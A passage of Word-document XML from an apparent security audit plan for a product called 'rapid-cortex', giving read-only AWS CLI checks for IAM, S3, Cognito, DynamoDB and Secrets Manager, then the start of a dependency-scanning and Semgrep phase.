          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">IAM Policy Audit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Check for wildcard IAM policies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">aws iam list-policies --scope Local | jq '.Policies[].PolicyName' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | xargs -I{} aws iam get-policy-version \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    --policy-arn arn:aws:iam::{ACCOUNT}:policy/{} \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    --version-id v1 \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | jq '.PolicyVersion.Document.Statement[] | select(.Action == "*")'</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Check Lambda execution roles for over-permission</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">aws lambda list-functions | jq '.[].FunctionName' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | xargs -I{} aws lambda get-function-configuration --function-name {} \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | jq '.Role'</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Use IAM Access Analyzer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">aws accessanalyzer list-findings --analyzer-arn {ANALYZER_ARN} \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | jq '.findings[] | select(.status=="ACTIVE")'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">S3 Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Check all buckets for public access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3api list-buckets | jq '.Buckets[].Name' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | xargs -I{} aws s3api get-public-access-block --bucket {}</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Check bucket policies for public access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3api get-bucket-policy --bucket rapid-cortex-media-{stage} \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | jq '.Policy' | python3 -c "import sys,json; print(json.dumps(json.loads(json.load(sys.stdin)), indent=2))"</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Verify BillingInvoicesBucket is not public</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3api get-public-access-block --bucket rapid-cortex-billing-invoices-prod</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Cognito Hardening Checklist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3240"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Expected Setting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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AWS CLI Check</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MFA enforcement</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Required for rcsuperadmin, rcadmin; optional for others</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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describe-user-pool → MfaConfiguration</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Password policy</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Min 12 chars, complexity required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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describe-user-pool → Policies.PasswordPolicy</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Account lockout</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After 5 failed attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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describe-user-pool → UserPoolAddOns</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Advanced security</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ENFORCED mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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describe-user-pool → UserPoolAddOns.AdvancedSecurityMode</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Token expiry</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Access: 60min, Refresh: 30 days max</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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describe-user-pool → Policies</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Email verification</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Required for all users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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describe-user-pool → AutoVerifiedAttributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">DynamoDB Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Verify encryption at rest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">aws dynamodb describe-table --table-name rapid-cortex-incidents-prod \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | jq '.Table.SSEDescription'</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Verify point-in-time recovery is enabled on critical tables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">aws dynamodb describe-continuous-backups \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  --table-name rapid-cortex-pricing-audit-prod \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | jq '.ContinuousBackupsDescription'</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Check for tables without DeletionPolicy: Retain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># This must be verified in the SAM/CloudFormation template</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -A2 'DeletionPolicy' infra/nested/stack-app-sam.yaml \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | grep -v Retain  # Any output here is a risk for critical tables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Secrets Manager Audit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># List all secrets and verify none are accessible without auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">aws secretsmanager list-secrets | jq '.SecretList[].Name'</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Verify BILLING_PAYMENT_INSTRUCTIONS secret has no placeholder values</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">aws secretsmanager get-secret-value \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  --secret-id {BILLING_PAYMENT_INSTRUCTIONS_SECRET_ARN} \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | jq '.SecretString | fromjson | keys'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Expected keys: achRoutingNumber, achAccountNumber, achAccountName,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#   wireSwiftCode, wireAccountNumber, checkPayableTo, checkMailAddress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass Criteria</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IAM policies with Action: * except on break-glass accounts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All S3 buckets have public access blocked</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Cognito advanced security mode set to ENFORCED</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All critical DynamoDB tables have DeletionPolicy: Retain</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All Secrets Manager secrets have rotation configured</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No plaintext credentials found in Lambda environment variables</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Phase 10 — Static Analysis and Dependency Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Static analysis runs against the source code without executing it, catching common vulnerability patterns, insecure coding practices, and known dependency CVEs. This phase runs in the CI/CD pipeline on every pull request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Dependency Vulnerability Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># npm audit — check for known CVEs in dependencies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">cd apps/api &amp;&amp; npm audit --audit-level=high</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">cd apps/web &amp;&amp; npm audit --audit-level=high</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Better npm audit with fix suggestions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">npx better-npm-audit audit --level high</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Check for outdated packages with known issues</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">npx npm-check-updates --target minor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">SAST — Semgrep</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Install semgrep</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
